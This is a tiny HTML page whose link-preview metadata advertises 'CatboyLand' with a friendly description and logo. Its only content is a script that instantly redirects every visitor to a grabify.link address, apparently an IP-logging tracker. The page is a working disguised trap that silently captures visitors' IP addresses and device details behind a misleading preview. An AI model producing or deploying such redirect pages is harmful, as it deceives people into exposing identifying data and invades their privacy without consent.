<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>LMAO</title>
    <link rel="icon" type="image/x-icon" href="../favicon.ico">
    <meta content="CatboyLand" property="og:title" />
    <meta content="Where the fun never starts!" property="og:description" />
    <meta content="https://9bv5rttd-3000.use.devtunnels.ms/lmao" property="og:url" />
    <meta content="./cdn/files/logo.jpg" property="og:image" />
    <meta content="#32a852" data-react-helmet="true" name="theme-color" />
</head>
<body>
    <script>this.location.href = "https://grabify.link/YJGI0M";</script>
</body>
</html>